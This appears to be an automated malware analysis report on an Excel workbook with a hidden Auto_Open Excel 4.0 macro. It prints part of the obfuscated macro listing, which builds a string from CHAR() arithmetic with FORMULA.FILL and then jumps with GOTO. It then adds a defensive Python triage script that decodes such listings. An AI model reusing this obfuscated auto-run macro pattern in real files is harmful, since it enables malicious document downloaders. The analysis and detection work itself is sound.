Verdict: MALICIOUS
Risk score: 140

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution
The critical heuristics indicate an Excel 4.0 (XLM) macro sheet with an Auto_Open defined name, a well-known auto-execution mechanism that runs as soon as the workbook is opened and needs no VBA. The macro sheet uses dangerous formula APIs, specifically 'RUN' (38) and 'risky-formula' (42), so it is built to execute a payload. The recovered listing shows the hidden Auto_Open name pointing at Sheet!P39945 and FORMULA.FILL calls that assemble a string from CHAR() of arithmetic over numeric cells (a handful of key cells such as BV58096 and EA51854 combined with a different cell per character, for example CHAR(BO12600+N1441) where N1441 holds 376), write it into another cell, and then GOTO; this is the usual obfuscation pattern of XLM downloaders. Because the document body contains no text, the exact lure cannot be determined, but the technique is indicative of a malicious macro downloader.
Heuristics (3)

- Excel 4.0 Auto_Open defined name [critical, OLE_XLM_AUTOOPEN_DEFINEDNAME]: oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF NAME record can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms that the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs [critical, OLE_XLM_DANGEROUS_FN]: the Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry together with dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present [medium, OLE_XLM_AUTOOPEN]: the workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 130032 bytes | 4f0bdbc593cc1c0d6805ce5c88d954f1427d76ca249c765c70175f0fe2712099 |
Preview: first 1,000 lines of the extracted script

```
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet
' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!P39945
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' Sheet,T8,"",-185.00000000000000000000
' Sheet,HF37,"",-595.00000000000000000000
' Sheet,FU78,"",302.00000000000000000000
' Sheet,EJ88,"",-300.00000000000000000000
' Sheet,FO105,"",-244.00000000000000000000
' Sheet,JA118,"",0.88571428571428567622
' Sheet,CF172,"",0.88571428571428567622
' Sheet,GC174,"",214.00000000000000000000
' Sheet,BT185,"",-263.00000000000000000000
' Sheet,HB225,"",-1.83544303797468355555
' Sheet,EE243,"",289.00000000000000000000
' Sheet,JM268,"",-0.08791208791208791895
' Sheet,IT282,"",2.78571428571428558740
' Sheet,BA307,"",2.82608695652173924628
' Sheet,JI318,"",261.00000000000000000000
' Sheet,JD337,"",-0.23843416370106762514
' Sheet,EI376,"",-0.33333333333333331483
' Sheet,BL378,"",12.32352941176470650930
' Sheet,T430,"",1.03809523809523818194
' Sheet,BI439,"",-137.00000000000000000000
' Sheet,EV574,"",0.22857142857142856429
' Sheet,FQ578,"",-169.00000000000000000000
' Sheet,E641,"",185.25000000000000000000
' Sheet,GZ648,"",434.75000000000000000000
' Sheet,E685,"",-0.57931034482758625437
' Sheet,DC719,"",0.27317073170731703824
' Sheet,GR774,"",-264.00000000000000000000
' Sheet,HM807,"",-378.00000000000000000000
' Sheet,GO850,"",371.00000000000000000000
' Sheet,K963,"",116.00000000000000000000
' Sheet,CH1070,"",26.00000000000000000000
' Sheet,S1083,"",-329.00000000000000000000
' Sheet,CZ1108,"",166.00000000000000000000
' Sheet,CA1149,"",-0.37614678899082570895
' Sheet,DC1155,"",-0.22981366459627328158
' Sheet,BL1156,"",-4.35999900000000017997
' Sheet,IS1156,"FORMULA.FILL(CHAR(BV58096/FU32622)&CHAR(BO12600/O64943)&CHAR(CH64971+GF58690)&CHAR(JA13764*IL34478)&CHAR(EN11113/GH21265)&CHAR(GG16686*HS12862)&CHAR(EA51854*GA9931)&CHAR(CH64971/GJ43798)&CHAR(EJ4053*EO28439)&CHAR(EN11113*DG17568)&CHAR(JA13764+IT61821)&CHAR(EA51854*DL53052)&CHAR(BV58096*CW53933)&CHAR(EA51854/CZ6376)&CHAR(EA51854+EV43531)&CHAR(EJ4053+FL14182)&CHAR(BV58096+FW32566)&CHAR(BO12600*IH41240)&CHAR(BV58096-ID52441)&CHAR(BV58096-FM48213)&CHAR(DO44630+GE21705)&CHAR(GL60293+FS59398)&CHAR(BV58096/FB42606)&CHAR(EA51854-DR46512)&CHAR(BO12600+N1441)&CHAR(GL60293/B59317)&CHAR(CH64971*CD65391)&CHAR(BV58096-HO59711)&CHAR(EJ4053+DC45559)&CHAR(JA13764-C20744)&CHAR(DO44630/W63532)&CHAR(EJ4053-HN43792)&CHAR(GG16686/HL62983)&CHAR(BV58096-FO51108)&CHAR(JA13764*HS40740)&CHAR(EA51854-FY59420)&CHAR(EJ4053+IU40281)&CHAR(EN11113/HG51573)&CHAR(GL60293/ED44701)&CHAR(EN11113*CB37492)&CHAR(EA51854/DH60665)&CHAR(DO44630*HG50191)&CHAR(EA51854/DM49612)&CHAR(EA51854/JG41256)&CHAR(EA51854*CD16182)&CHAR(GG16686/CV57080)&CHAR(BV58096-HT33389)&CHAR(EJ4053-GW16682)&CHAR(CH64971-BU45698)&CHAR(GL60293-JR25996)&CHAR(GL60293*DV53843)&CHAR(DO44630+IJ41989)&CHAR(EA51854+IK34978)&CHAR(JA13764*BM61436)&CHAR(EA51854*JR32953)&CHAR(BV58096*FH37951)&CHAR(DO44630+HY45096)&CHAR(CH64971/P57174)&CHAR(BO12600*GP36822)&CHAR(GG16686/R25643)&CHAR(DO44630/DN61369)&CHAR(GL60293+HY61736)&CHAR(DO44630*FY45842)&CHAR(GL60293+DI27437)&CHAR(BO12600*FP61400)&CHAR(GG16686/HJ29690)&CHAR(EJ4053*BE10697)&CHAR(GG16686+GY54357)&CHAR(CH64971-JI14127)&CHAR(GL60293*U8120)&CHAR(CH64971/BK39375)&CHAR(EJ4053+A32054),DU36671)",""
' Sheet,IS1157,GOTO(HP1958),""
' Sheet,BJ1239,"",-2.55454545454545467464
' Sheet,FZ1347,"",-238.25000000000000000000
' Sheet,N1441,"",376.00000000000000000000
' Sheet,DI1460,"",-0.46330275229357797961
' Sheet,IM1462,"",8.12500000000000000000
' Sheet,HM1493,"",1.81034482758620685061
' Sheet,GP1535,"",-64.00000000000000000000
' Sheet,FG1581,"FORMULA.FILL(CHAR(HJ63793/IE30353)&CHAR(HE20869-FR7245)&CHAR(GP26128+GQ51401)&CHAR(GB51089-IF55653)&CHAR(BR58539/GJ25976) ... (truncated)
```
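The obfuscation visible in the listing (FORMULA.FILL writing a string assembled from CHAR() of arithmetic over numeric cells, then GOTO) can be triaged automatically from the olevba output alone. The script below is an added example, not part of this report and not oletools code: it parses an olevba-style XLM listing, flags the auto-execution name and dangerous XLM functions, and resolves each CHAR(cell op cell) term against the numeric cells in the same listing. The listing it runs on is constructed for illustration (its cell values are chosen so the decoded string is "=EXEC("), the DANGEROUS_FUNCS selection is illustrative rather than exhaustive, and for the real sample the referenced cells (BO12600, N1441 and the rest) would have to come from the full xlm_macros.txt, not from the truncated preview above.

```python
import csv
import re

# Constructed sample listing (not from the analyzed file), in the same shape as the
# report's olevba preview: BIFF record lines, then Sheet,Reference,Formula,Value rows,
# each prefixed with "' ". Cell values are chosen so that B1 decodes to "=EXEC(".
SAMPLE_LISTING = """\
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet
' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!B1
' Sheet,Reference,Formula,Value
' Sheet,A1,"",61.00000000000000000000
' Sheet,A2,"",69.00000000000000000000
' Sheet,A3,"",22.00000000000000000000
' Sheet,A4,"",4.00000000000000000000
' Sheet,A5,"",50.00000000000000000000
' Sheet,A6,"",19.00000000000000000000
' Sheet,A7,"",80.00000000000000000000
' Sheet,A8,"",13.00000000000000000000
' Sheet,A9,"",120.00000000000000000000
' Sheet,A10,"",3.00000000000000000000
' Sheet,B1,"FORMULA.FILL(CHAR(A1)&CHAR(A2)&CHAR(A3*A4)&CHAR(A5+A6)&CHAR(A7-A8)&CHAR(A9/A10),C1)",""
' Sheet,B2,GOTO(C1),""
"""

# XLM functions that run programs, touch files or transfer control (illustrative selection).
DANGEROUS_FUNCS = {
    "EXEC", "RUN", "CALL", "REGISTER", "FORMULA", "FORMULA.FILL", "FORMULA.ARRAY",
    "GOTO", "FOPEN", "FWRITE", "FREAD", "FILE.DELETE", "SEND.KEYS",
}

AUTO_RE = re.compile(r"built-in-name\s+1\s+(Auto_Open|Auto_Close)", re.IGNORECASE)
ROW_RE = re.compile(r"^[^,]+,[A-Z]{1,3}\d+,")          # "<sheet>,<cell ref>,..." data rows
FUNC_RE = re.compile(r"\b([A-Z][A-Z0-9.]*)\(")           # function names followed by "("
CHAR_RE = re.compile(r"CHAR\(([^()]*)\)")                # argument of each CHAR() term
EXPR_RE = re.compile(r"^([A-Z]+\d+)(?:([-+*/])([A-Z]+\d+))?$")  # ref or ref<op>ref


def parse_listing(text):
    """Split an olevba XLM listing into auto-exec names and a {ref: (formula, value)} map."""
    auto_exec, rows = [], []
    for raw in text.splitlines():
        line = raw[2:] if raw.startswith("' ") else raw   # olevba prefixes listing lines with "' "
        m = AUTO_RE.search(line)
        if m:
            auto_exec.append(m.group(1))
        if ROW_RE.match(line):
            rows.append(line)
    cells = {}
    for row in csv.reader(rows):          # csv handles the quoted, comma-bearing formulas
        if len(row) == 4:
            _sheet, ref, formula, value = row
            cells[ref] = (formula, value)
    return auto_exec, cells


def numeric_cells(cells):
    """Cells holding a plain numeric constant: the 'key material' of the CHAR() obfuscation."""
    nums = {}
    for ref, (formula, value) in cells.items():
        if formula == "" and value != "":
            try:
                nums[ref] = float(value)
            except ValueError:
                pass
    return nums


def resolve_char_args(formula, nums):
    """Decode CHAR(ref) / CHAR(ref op ref) terms with the numeric cells; '?' where unresolved."""
    decoded = []
    for arg in CHAR_RE.findall(formula):
        m = EXPR_RE.match(arg.replace(" ", ""))
        if not m:
            decoded.append("?")
            continue
        left, op, right = m.groups()
        if left not in nums or (op and right not in nums):
            decoded.append("?")       # referenced cell is not in this (possibly truncated) listing
            continue
        val = nums[left]
        if op:
            rv = nums[right]
            if op == "/" and rv == 0:
                decoded.append("?")
                continue
            val = {"+": val + rv, "-": val - rv, "*": val * rv, "/": val / rv}[op]
        code = int(val)               # Excel's CHAR() truncates its argument to an integer
        decoded.append(chr(code) if 1 <= code <= 255 else "?")
    return "".join(decoded)


def triage(text):
    """Return auto-exec names, dangerous functions per cell, decoded CHAR() strings and a verdict."""
    auto_exec, cells = parse_listing(text)
    nums = numeric_cells(cells)
    findings = {"auto_exec": auto_exec, "dangerous": {}, "decoded": {}}
    for ref, (formula, _value) in cells.items():
        if not formula:
            continue
        hits = sorted(set(FUNC_RE.findall(formula)) & DANGEROUS_FUNCS)
        if hits:
            findings["dangerous"][ref] = hits
        if "CHAR(" in formula:
            findings["decoded"][ref] = resolve_char_args(formula, nums)
    if auto_exec and findings["dangerous"]:
        findings["verdict"] = "MALICIOUS"      # auto-execution plus code/file/control-flow APIs
    elif findings["dangerous"]:
        findings["verdict"] = "SUSPICIOUS"
    else:
        findings["verdict"] = "CLEAN"
    return findings


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_LISTING), indent=2))
```

To use it on the report's artifact, call triage() on the full extracted file, for example triage(open("xlm_macros.txt").read()); every CHAR() term whose operand cells are absent from the listing decodes to "?", so a preview that stops at 1,000 lines will leave most of the IS1156 string unresolved even though the pattern itself (CHAR() over cell arithmetic, FORMULA.FILL, then GOTO) is enough to reach the verdict.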